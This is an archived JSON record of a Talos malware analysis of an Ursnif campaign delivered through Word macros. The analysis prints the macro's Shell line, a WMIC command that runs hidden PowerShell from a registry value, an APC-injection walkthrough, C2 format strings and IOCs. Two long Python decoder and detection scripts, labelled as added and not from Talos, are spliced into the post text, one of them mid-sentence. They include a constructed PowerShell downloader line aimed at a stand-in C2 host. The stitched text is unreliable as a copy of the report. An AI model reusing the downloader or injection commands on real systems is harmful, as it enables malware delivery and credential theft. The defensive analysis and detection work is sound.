{
	"id": "37790061-4446-4ab7-b214-ce9d09bb8f5a",
	"created_at": "2026-04-06T00:10:35.960209Z",
	"updated_at": "2026-04-10T03:20:45.106737Z",
	"deleted_at": null,
	"sha1_hash": "6dd0e8eec77b8535ef0376945b6b5d973e4dc4b0",
	"title": "Cisco AMP tracks new campaign that delivers Ursnif",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 710836,
	"plain_text": "Cisco AMP tracks new campaign that delivers Ursnif\r\nBy Cisco Talos\r\nPublished: 2019-01-24 · Archived: 2026-04-05 13:49:36 UTC\r\nThursday, January 24, 2019 13:39\r\nBy John Arneson.\r\nExecutive Summary\r\nCisco Talos once again spotted the Ursnif malware in the wild. We tracked this information stealer after Cisco's\r\nAdvanced Malware Protection (AMP) Exploit Prevention engine alerted us to these Ursnif infections. Thanks to\r\nAMP, we were able to prevent Ursnif from infecting any of its targets. The alert piqued our curiosity, so we began\r\nto dig a bit deeper and provide some recent IoCs related to this threat, which traditionally attempts to steal users'\r\nbanking login credentials and other login information. Talos has covered Ursnif in the past, as it is one of the most\r\npopular malware families that attackers have deployed recently. In April, we detected that Ursnif was being delivered via\r\nmalicious emails along with the IcedID banking trojan.\r\nMalicious Office document\r\nThe Ursnif sample from the alert comes from a Microsoft Word document containing a malicious VBA macro.\r\nThe document is straightforward, simply displaying an image that asks the user to enable macros. If macros are\r\nalready permitted, the macro is executed automatically when opening the document via the AutoOpen function.\r\nhttps://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html\r\nPage 1 of 9\n\nThe macro is mostly obfuscated code that executes math functions on data that does not relate to the next stage.\r\nThere is only one line in the macro that matters for executing the next stage, which ultimately runs PowerShell.\r\nInteraction@.Shell RTrim(LTrim(Shapes(\"j6h1cf\").AlternativeText)), 84 * 2 + -168\r\nThis line reads the AlternativeText property of the Shapes object \"j6h1cf.\" The value of this property is the\r\nmalicious PowerShell command, which is then executed by the Shell function. The second argument, 84 * 2 + -168, evaluates to 0 (vbHide), so the spawned process runs without a visible window. 
The PowerShell command\r\nis base64 encoded, and is another PowerShell command that downloads Ursnif. Specifically, it downloads an\r\nexecutable from its C2 to the AppData directory and executes it. Note that this is where the Exploit Prevention engine\r\nstops execution of the downloaded file and provides us with alerts to investigate.\r\nInfection\r\nAfter the Ursnif executable is downloaded and executed, registry data is created that is important for the next\r\nstage of execution.\r\nThe PowerShell command for the next stage of execution resides in the registry value named APHohema, as shown in\r\nthe image above.\r\nThis command uses Windows Management Instrumentation Command-line (WMIC) to execute PowerShell,\r\nwhich reads the Authicap value and executes it. The Authicap value is a hexadecimal-encoded PowerShell command. The WMIC command uses /output:clipboard to hide the normal\r\noutput of process creation that is printed when creating a process with WMIC.\r\nC:\\WINDOWS\\system32\\wbem\\wmic.exe /output:clipboard process call create \"powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\236FF8AB-268A-4D1B-4807-BAD1FC2B8E95').Authicap))\"\r\nThe hexadecimal-encoded PowerShell command executed from Authicap decodes to a large PowerShell\r\ncommand, of which the most interesting part is base64-encoded. There are three parts to the command. The first\r\npart creates a function that is later used to decode base64-encoded PowerShell. The second part creates a byte\r\narray containing a malicious DLL. The third part calls the base64 decode function created in the first part,\r\nwith a base64-encoded string as its parameter. 
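The encodings met so far (base64 of a UTF-16LE string in the macro's PowerShell one-liner, the hex bytes of Authicap, and the plain base64 handed to the inline decode function) can be peeled mechanically during triage. The following Python is an added example and not code from the Talos post. It assumes the macro's command is carried with PowerShell's -EncodedCommand switch, which the post does not state (it only says base64); the sample payloads are constructed, the domain c2.example.invalid is hypothetical, and 1688e8b.exe is taken from the post's dropped-file list.

```python
import base64
import binascii
import re

# Added example, not code from the Talos post. Peels the encodings the post describes for the
# staged PowerShell: -EncodedCommand (base64 of UTF-16LE) in the macro's one-liner (the switch
# itself is an assumption; the post only says base64), hex bytes in the Authicap value (ASCII),
# and a plain base64 token passed to an inline decode function. Samples below are constructed.

B64_TOKEN = re.compile('^[A-Za-z0-9+/]+={0,2}$')
HEX_TOKEN = re.compile('^(?:[0-9A-Fa-f]{2})+$')
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile('(?<![A-Za-z])-e[a-z]*\\s+([A-Za-z0-9+/]{16,}={0,2})', re.I)
URL_RE = re.compile('https?://[^\\s()\\x22\\x27;,]+', re.I)
EXE_RE = re.compile('[A-Za-z0-9_-]+\\.exe', re.I)

def decode_encoded_command(cmdline):
    '''Return the script behind powershell -enc <b64>, or None if the flag is absent.'''
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode('utf-16-le')

def decode_hex(hexstr):
    '''Decode a hex byte string such as the Authicap value (ASCII, per the post).'''
    return binascii.unhexlify(hexstr.strip()).decode('ascii')

def unwrap(blob, max_depth=6):
    '''Peel encoding layers; returns every intermediate form, outermost first.'''
    layers = [blob]
    for _ in range(max_depth):
        cur = layers[-1].strip()
        try:
            if HEX_TOKEN.match(cur):
                nxt = decode_hex(cur)
            elif ENC_FLAG.search(cur):
                nxt = decode_encoded_command(cur)
            elif B64_TOKEN.match(cur) and len(cur) % 4 == 0:
                raw = base64.b64decode(cur)
                # UTF-16LE text of an ASCII script has a NUL in every odd position
                nxt = raw.decode('utf-16-le' if len(raw) > 1 and raw[1] == 0 else 'ascii')
            else:
                break
        except (binascii.Error, UnicodeDecodeError):
            break
        layers.append(nxt)
    return layers

def extract_iocs(script):
    '''Pull URLs and executable names out of a decoded stage, preserving first-seen order.'''
    exes = []
    for name in EXE_RE.findall(script):
        if name not in exes:
            exes.append(name)
    return {'urls': URL_RE.findall(script), 'exe_names': exes}

# Constructed samples. c2.example.invalid is hypothetical; 1688e8b.exe is from the post's list.
SAMPLE_INNER = '''(New-Object Net.WebClient).DownloadFile('http://c2.example.invalid/load.exe', $env:APPDATA + '\\1688e8b.exe'); Start-Process ($env:APPDATA + '\\1688e8b.exe')'''
SAMPLE_MACRO_CMD = 'powershell -nop -w hidden -enc ' + base64.b64encode(SAMPLE_INNER.encode('utf-16-le')).decode('ascii')
SAMPLE_STAGE3 = '[System.Runtime.InteropServices.Marshal]::Copy($dll, 0, $mem, $dll.Length)'
SAMPLE_AUTHICAP_HEX = binascii.hexlify(base64.b64encode(SAMPLE_STAGE3.encode('ascii'))).decode('ascii')

if __name__ == '__main__':
    for sample in (SAMPLE_MACRO_CMD, SAMPLE_AUTHICAP_HEX):
        layers = unwrap(sample)
        print(len(layers) - 1, 'layer(s) removed ->', layers[-1])
        print('  iocs:', extract_iocs(layers[-1]))
```

In practice the inputs are the shape's AlternativeText string pulled from the document (olevba or oledump will give it) and the exported Authicap value; unwrap stops as soon as a layer no longer looks like one encoded token, which is exactly where a human needs to read the script anyway.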
The returned decoded PowerShell is subsequently\r\nexecuted by the shorthand Invoke-Expression (iex) function.\r\nThe decoded base64 PowerShell that iex executes performs an Asynchronous Procedure Call (APC)\r\ninjection.\r\nThe first part of the command creates two variables that import functions from kernel32.dll. In this case, the variables are\r\n$igaoctlsc and $gdopgtvl, as seen being established by the Add-Type cmdlet.\r\nThe APIs imported from kernel32 are:\r\nGetCurrentProcess\r\nVirtualAllocEx\r\nGetCurrentThreadId\r\nQueueUserAPC\r\nOpenThread\r\nSleepEx\r\nAfter the imports are established, the last portion is a single line that performs the APC injection via the\r\nQueueUserAPC API. Here is the simplified form of that single line, with more readable formatting and\r\nnormalized variable names.\r\nThe injection starts by allocating memory for the malicious DLL with VirtualAllocEx, targeting the current\r\nprocess. If the allocation succeeds, it copies the malicious DLL into the newly allocated memory with\r\nCopy (Marshal.Copy). Once that is complete, QueueUserAPC is called with a handle to the current thread. This\r\ncreates a user-mode APC and queues it on that thread. For the queued APC to run the malicious DLL, the\r\nthread has to enter an alertable state; SleepEx provides that by being called with 1 (TRUE) as its second parameter, bAlertable, which completes the injection.\r\nC2 Traffic\r\nAfter infection, the C2 requests are made over HTTPS. Intercepting the traffic, we are able to see the contents of\r\nthe requests. 
The most interesting part of the requests is that the data is put into a CAB file format prior to\r\nexfiltration.\r\nURI Format Strings\r\nsoft=%u\u0026version=%u\u0026user=%08x%08x%08x%08x\u0026server=%u\u0026id=%u\u0026crc=%x\r\nversion=%u\u0026soft=%u\u0026user=%08x%08x%08x%08x\u0026server=%u\u0026id=%u\u0026type=%u\u0026name=%s\r\n/data.php?version=%u\u0026user=%08x%08x%08x%08x\u0026server=%u\u0026id=%u\u0026type=%u\u0026name=%s\r\ntype=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s\\\r\nUser-Agent Format String\r\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)\r\nThe CAB files containing the data to be exfiltrated are stored in %TEMP%, with the filename format being four\r\nhexadecimal characters and a .bin extension. As Ursnif logs data to be exfiltrated, it creates CAB files to store the\r\ndata with the built-in makecab.exe command. The command targets a MakeCab directive file that Ursnif creates in the\r\n%TEMP% directory. The images below show the created CAB files in %TEMP% and the MakeCab directives.\r\nInside the created CAB files is plaintext data in the format:\r\n\u003cCurrent Date and Time\u003e \u003cProcess Path\u003e \u003cWindow Text\u003e \u003cKeystrokes Logged\u003e\r\nConclusion\r\nTalos continues to monitor these threats as they evolve to ensure that defenses protect our customers. We strongly\r\nencourage users and organizations to follow recommended security practices, such as installing security patches as\r\nthey become available, exercising caution when receiving messages from unknown third parties, and ensuring that\r\na robust offline backup solution is in place. Ursnif compresses its data into CAB files prior to exfiltration, so\r\nknowing that stolen data may leave the host packaged that way, rather than as plaintext, will assist you in protecting and monitoring your environment. 
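Before the indicator list, here is how the behaviours described above translate into checks a SOC could run over process-creation events, PowerShell script-block logs and proxy logs: wmic.exe with /output:clipboard spawning a hidden PowerShell that reads the AppDataLow key under HKCU, an Add-Type block importing the kernel32 APC set, makecab.exe pointed at a directive file in %TEMP%, and egress whose URI and User-Agent fit the format strings. This is an added Python example, not code from the Talos post; the records it scans are constructed, the user, host, domain (c2.example.invalid) and directive file name are hypothetical, and the registry path and format strings are the ones quoted in the post.

```python
import re
from urllib.parse import urlsplit

# Added example, not code from the Talos post. Checks over constructed host and proxy records
# for behaviours the post describes: wmic.exe /output:clipboard launching a hidden PowerShell
# that reads the AppDataLow key under HKCU, an Add-Type block importing the kernel32 APC set,
# makecab.exe run against a directive file in %TEMP%, and egress matching the format strings.

WMIC_CREATE = re.compile('wmic(?:\\.exe)?\\s+/output:clipboard\\s+process\\s+call\\s+create', re.I)
APPDATALOW = re.compile('HKCU:\\\\Software\\\\AppDataLow\\\\', re.I)
HEX_NAMED_EXE = re.compile('\\\\AppData\\\\Roaming\\\\[0-9a-f]{6,8}\\.exe$', re.I)   # %AppData%/<hex>.exe
MAKECAB_TEMP = re.compile('makecab(?:\\.exe)?\\s.*?/f\\s+\\S*\\\\Temp\\\\', re.I)     # makecab /F <directive in %TEMP%>
APC_APIS = ('VirtualAllocEx', 'QueueUserAPC', 'OpenThread', 'SleepEx')

URI_FORMATS = (
    'soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x',
    'version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s',
    '/data.php?version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s',
)
UA_FORMAT = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)'
TOKEN = re.compile('%(0\\d+)?([uxXsS])')

def fmt_to_regex(fmt):
    '''Compile a printf-style format string into an anchored regex.'''
    parts, pos = [], 0
    for m in TOKEN.finditer(fmt):
        parts.append(re.escape(fmt[pos:m.start()]))
        width, kind = m.group(1), m.group(2)
        if kind == 'u':
            parts.append('\\d+')
        elif kind in 'xX':
            parts.append('[0-9a-fA-F]{%d}' % int(width[1:]) if width else '[0-9a-fA-F]+')
        else:
            parts.append('[^&]*')   # %s / %S: free text up to the next parameter
        pos = m.end()
    parts.append(re.escape(fmt[pos:]))
    return re.compile('^' + ''.join(parts) + '$')

URI_RES = [fmt_to_regex(f) for f in URI_FORMATS]
UA_RE = fmt_to_regex(UA_FORMAT)

def check_process(ev):
    '''ev: dict with image, parent, cmdline (Sysmon event 1 or Security 4688). Returns hit names.'''
    hits, cmd = [], ev.get('cmdline', '')
    if WMIC_CREATE.search(cmd):
        hits.append('wmic-clipboard-create' + ('-appdatalow' if APPDATALOW.search(cmd) else ''))
    if HEX_NAMED_EXE.search(ev.get('parent', '')):
        hits.append('parent-hex-named-appdata-exe')   # weak alone: names vary and can collide
    if MAKECAB_TEMP.search(cmd):
        hits.append('makecab-temp-directive')
    return hits

def check_scriptblock(text):
    '''text: a logged PowerShell script block (event 4104). Flags Add-Type importing the APC set.'''
    if 'Add-Type' not in text:
        return []
    found = [api for api in APC_APIS if api in text]
    return ['apc-injection-imports:' + ','.join(found)] if len(found) >= 3 else []

def match_request(url, ua):
    '''Hit names for a proxied request. The UA alone is a common old-IE string; weight it low.'''
    u, hits = urlsplit(url), []
    for i, rx in enumerate(URI_RES):
        if rx.match(u.query) or rx.match(u.path + '?' + u.query):
            hits.append('uri-format-%d' % (i + 1))
    if UA_RE.match(ua):
        hits.append('ua-format')
    return hits

def scan(events, scriptblocks, requests):
    '''Run every check; returns (source, hit) pairs.'''
    out = [(ev['image'], h) for ev in events for h in check_process(ev)]
    out += [('scriptblock', h) for sb in scriptblocks for h in check_scriptblock(sb)]
    out += [(url, h) for url, ua in requests for h in match_request(url, ua)]
    return out

# Constructed sample records: user, host, domain and directive file name are hypothetical;
# the registry path is the one quoted in the post.
SAMPLE_EVENTS = [
    {'image': 'C:\\WINDOWS\\system32\\wbem\\wmic.exe',
     'parent': 'C:\\Users\\alice\\AppData\\Roaming\\1688e8b.exe',
     'cmdline': 'wmic.exe /output:clipboard process call create powershell -w hidden '
                'iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty '
                'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\236FF8AB-268A-4D1B-4807-BAD1FC2B8E95).Authicap))'},
    {'image': 'C:\\WINDOWS\\system32\\makecab.exe', 'parent': 'C:\\Users\\alice\\AppData\\Roaming\\1688e8b.exe',
     'cmdline': 'makecab.exe /F C:\\Users\\alice\\AppData\\Local\\Temp\\4a1f.ddf'},
    {'image': 'C:\\WINDOWS\\system32\\wbem\\wmic.exe', 'parent': 'C:\\WINDOWS\\explorer.exe',
     'cmdline': 'wmic.exe os get caption'},   # benign control record
]
SAMPLE_SCRIPTBLOCK = ('$k32 = Add-Type -MemberDefinition $def -Name a -Namespace b -PassThru; '
                      '# $def declares DllImport kernel32.dll VirtualAllocEx, QueueUserAPC, OpenThread, SleepEx')
SAMPLE_REQUESTS = [
    ('https://c2.example.invalid/data.php?version=2&user=0123abcd4567ef89abcdef0123456789&server=12&id=1&type=1&name=4a1f.bin',
     'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64)'),
    ('https://www.example.invalid/index.html', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'),
]

if __name__ == '__main__':
    for src, hit in scan(SAMPLE_EVENTS, [SAMPLE_SCRIPTBLOCK], SAMPLE_REQUESTS):
        print(hit, '<-', src)
```

The parent-name and User-Agent checks are weak signals on their own (the post itself warns that dropped-file names can collide with benign ones, and the IE8 string is common), so treat them as corroboration for the wmic, Add-Type and URI hits rather than as alerts in themselves. The format-string matching is deliberately strict about the four 8-digit hex groups in the user field, since that is the part a benign query string is least likely to reproduce.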
To\r\nhelp with the detection of this malware, we are providing readers with a list of IOCs below that can help you\r\nidentify and stop Ursnif before it infects your network.\r\nIndicators of Compromise (IOCs)\r\nHere are some recent IOCs from our tracking of Ursnif.\r\nMalicious documents:\r\ndb7f0dab70e1da8ef7a6a6d938531f2a6773c0c5f925f19874fd3e764aa45833\r\ne58827967cba544cc1db3d751095878115f4247982fb514bbd7b98bced8de6c0\r\n3846fe442df0175461081dd63299144a233debbd2453deeeb405126042ef72d1\r\n982cf7af71d0fe54cbdfac74fd2985c48a011e6ffffe65012ee4496bb669b321\r\ncbc10db9d7609e548e550e79f45940125895374b9a97e133020d5585bfd183ed\r\n2dbd942ac2f0b92d497fa6595f638cbddc24eab8beffb7cc648a91d65b45fa09\r\n38c459e56997e759ca680f88aae4428d9c76e9fae323b4d2238adf203036007c\r\n153c191ef4afd3eba9df89150ac728757efcba1293716c23f019e35270a388c4\r\n95f5f2ecdce872f5b96739f548e4b73bb8b7a2c11c46cfddf3e20fd04abfc091\r\n1cf5de71d51d2769079a8cb64e05f80e72e88846987602ad7302478c0d574caa\r\nc9f42b866fc203b4cd9d09cfcb0f8fca41097548393c15adb0557652526d818a\r\nba332017cbf16842170788f5688e3b8a79c821ef1331e428d77af238c379be4f\r\nb278b0e63acbbb92396da41bffb99b9ef09dff1b1b838f69e29245c6731269f7\r\nb6837f46124a360ffff235824cc1decda2b97d6daf73e80f3615bce7781a86aa\r\n12e3140656d7df63a1c444b0ebdae75039a18799e2ebd03a80eeb26ce5dbb66c\r\nd3383c7ee9704b51b302d7e611214a78050fcc7ad0969682355894af58f63cdf\r\n3eff10af3f2afbcf59d5cf77f470abe3cfafbe48255e7f6ea56a22608e332824\r\nad87dcc617e9914e28f76d071b586ac2cca9454078f3141c17e0102c9e2eebaa\r\n65f81148184a7ec71a43e9cd50e1267ab3fc64f3ef5f41f9da8bd74000baad30\r\nf7cc1b8f93831f7170e5317b5b79aaa9ceb2bc6724f21bc4e2c6cccb71655624\r\nd08e92af78cbf7049e8a9ca7b6ab61e8dc42729848e73b980b7cf5ac74d505af\r\n1b0b9cfaa78fac0875d10d087b8354d52bffb1f576eec7d49acab9d3394ccd9a\r\nd48f2cb5cc595f5cea29b7fd2bd8463fdfaf980c48792294ebb4c798516a7eae\r\n5a739f018675094baf0b61ff8462b1c946410f4776be877719cb20f9
a9c16dfd\r\nd53ace589ad1a39487f36dd3e516ac2a5af0aec521f28c5b78b3a47636cfb068\r\n0778ef085fdebd39856ebfa4bf1203dcb7ee59fa4fc82a71a2ef3a949143c543\r\n4ffe626708fa6a2d76366a962359658e0d919544260aa2179727964c34e12080\r\n4dedf0b96b253b8fc15b007e4f61eb85d0345ef19f5a1fc6ea0772614375f606\r\nf3c7d7c0e71d15dc03614964c887a2459bd0ae4a97a324018a97dff27608e4b2\r\n8b73b12aad16a58d07048a307a7a558755d0f5ca369dbee8b808a9d9c941a25d\r\na2ae329bf70c24e4380d6133a4c02127e09597111e4edfd7808aa471450d2332\r\n001f52a0fa8d4abe34bfff6c96b423435c0ad3e06d40ece228fe2db3bc0d1067\r\nb4b56db2ce95d52b018edee05f996a1b5ae11a289979e984157a0efb7bbbc9b9\r\n617f1260e18929704c0ef45dae5eee7b9690b7a95f66e76ac00cf9dd2fca465b\r\nc283c26a991fd3599e8fd91bf059c2dbb07d3d630caf699531c48737faedc325\r\n447f249e60df0324f74a40a4b35f432b2e19f801ce2d4d6efa126a6841836b11\r\nd7aeacb2b12cef81315a64670a27575d84ac1af4541000d0093fdb3676afc515\r\nd200cbc2b28811bf4762d664a4b3f9f58f6b20af03981910dc2317751f91027d\r\nb409ee2691e7b2d2598cd01ac28a0914d4778da8d8b7a62d2f78492b14790917\r\ne95af1012346ab3edbb365f3463bd060bfa7f194b7c68c8e680dfbde43c57eb7\r\n015e2b8de525789f551abb4af169ad914f218fb07df2496c6f23d51d6a711688\r\nC2 Server Domains:\r\nlevocumbut[.]com\r\nrapworeepa[.]com\r\nwegatamata[.]com\r\nroevinguef[.]com\r\npivactubmi[.]com\r\nbiesbetiop[.]com\r\nnavectrece[.]com\r\nyancommato[.]com\r\ndewirasute[.]com\r\nptyptossen[.]com\r\nmochigokat[.]com\r\ntubpariang[.]com\r\nzardinglog[.]com\r\nabregeousn[.]com\r\naplatmesse[.]com\r\nabeelepach[.]com\r\nteomengura[.]com\r\nallooalel[.]club\r\nnublatoste[.]com\r\nledibermen[.]com\r\nlootototic[.]com\r\nacnessempo[.]com\r\nusteouraph[.]com\r\nizzlebutas[.]com\r\nsfernacrif[.]com\r\nisatawatag[.]com\r\nduenexacch[.]com\r\nkyllborena[.]com\r\nbawknogeni[.]com\r\nkicensinfa[.]com\r\nuvuladitur[.]com\r\nFiles Dropped\r\nNote that the filenames are hardcoded in the first PowerShell command executed and vary by sample. This means\r\nthat these indicators aren't necessarily malicious on their own, as filenames might collide with benign ones. If\r\nfound with other indicators, it's likely an Ursnif infection.\r\n%AppData%/137d1dc1.exe\r\n%AppData%/1688e8b.exe\r\n%AppData%/1bdf65af.exe\r\n%AppData%/1cf8f7bb.exe\r\n%AppData%/2662438a.exe\r\n%AppData%/284ca7b3.exe\r\n%AppData%/31d073c1.exe\r\n%AppData%/3209f93c.exe\r\n%AppData%/3d4480c4.exe\r\n%AppData%/3fabbd27.exe\r\n%AppData%/40dc969c.exe\r\n%AppData%/4d46c42f.exe\r\n%AppData%/530ddba6.exe\r\n%AppData%/56ef205c.exe\r\n%AppData%/58b00f30.exe\r\n%AppData%/58f9603c.exe\r\n%AppData%/60404124.exe\r\n%AppData%/62574d8.exe\r\n%AppData%/6420f61f.exe\r\n%AppData%/6aad9e36.exe\r\n%AppData%/6ed4c1be.exe\r\n%AppData%/71bdcc14.exe\r\n%AppData%/75e1d341.exe\r\n%AppData%/7bc0a512.exe\r\n%AppData%/7df15b.exe\r\n%AppData%/8428791f.exe\r\n%AppData%/8c1d4ca.exe\r\n%AppData%/8d04e64a.exe\r\n%AppData%/97729da0.exe\r\n%AppData%/97979225.exe\r\n%AppData%/9835041d.exe\r\n%AppData%/9eb826ef.exe\r\n%AppData%/a54ab0bc.exe\r\n%AppData%/a9f1df84.exe\r\n%AppData%/aa5cc687.exe\r\n%AppData%/af74ae98.exe\r\n%AppData%/b034a4.exe\r\n%AppData%/bb5144e8.exe\r\n%AppData%/c1a17119.exe\r\n%AppData%/cbd42398.exe\r\n%AppData%/cf63b795.exe\r\n%AppData%/d5e1b91a.exe\r\n%AppData%/da0170a9.exe\r\n%AppData%/def4b6bf.exe\r\n%AppData%/e199be3d.exe\r\n%AppData%/e5920466.exe\r\n%AppData%/e7972c72.exe\r\n%AppData%/f005cb48.exe\r\n%AppData%/f0107edb.exe\r\n%AppData%/f2134754.exe\r\n%AppData%/fa408793.exe\r\nSource: https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html"
	],
	"report_names": [
		"amp-tracks-ursnif.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434235,
	"ts_updated_at": 1775791245,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6dd0e8eec77b8535ef0376945b6b5d973e4dc4b0.pdf",
		"text": "https://archive.orkl.eu/6dd0e8eec77b8535ef0376945b6b5d973e4dc4b0.txt",
		"img": "https://archive.orkl.eu/6dd0e8eec77b8535ef0376945b6b5d973e4dc4b0.jpg"
	}
}